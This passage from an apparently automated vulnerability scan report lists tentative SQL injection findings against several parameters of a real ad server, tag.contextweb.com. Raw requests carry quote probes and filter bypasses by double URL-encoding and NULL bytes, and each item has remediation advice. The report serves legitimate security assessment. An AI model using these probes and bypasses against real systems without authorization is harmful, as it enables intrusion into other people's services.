P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:49:38 GMT
Content-Length: 2565
Connection: close
Set-Cookie: vf=1100; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_5vjkeBW8txQp%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:49:39 GMT
Content-Length: 2264
Connection: close
Set-Cookie: 539292_4_107784_-1=1316224179419; Domain=.contextweb.com; Path=/
Set-Cookie: vf=1101; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...
|
1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ca request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2565
Date: Sat, 17 Sep 2011 01:46:43 GMT
Connection: close
Set-Cookie: vf=787; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_cfDJ2QoPglRh%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2264
Date: Sat, 17 Sep 2011 01:46:45 GMT
Connection: close
Set-Cookie: 539292_4_107784_-1=1316224004962; Domain=.contextweb.com; Path=/
Set-Cookie: vf=788; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...
|
1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The cwu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cwu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cwu request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:54 GMT
Content-Length: 2044
Connection: close
Set-Cookie: vf=489; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_JCVEUma2gDZb%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1816
Date: Sat, 17 Sep 2011 01:17:55 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222275911; Domain=.contextweb.com; Path=/
Set-Cookie: vf=490; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...
|
1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The cxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00'&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=536; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:01 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app202_NcHteBNElrNX%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00''&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2372
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222325784; Domain=.contextweb.com; Path=/
Set-Cookie: vf=537; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...
|
1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The dw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the dw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:49 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=484; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app209_0s7g5vuuP87p%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/106
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:50 GMT
Content-Length: 1708
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222270352; Domain=.contextweb.com; Path=/
Set-Cookie: vf=485; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...
|
1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The epid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the epid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
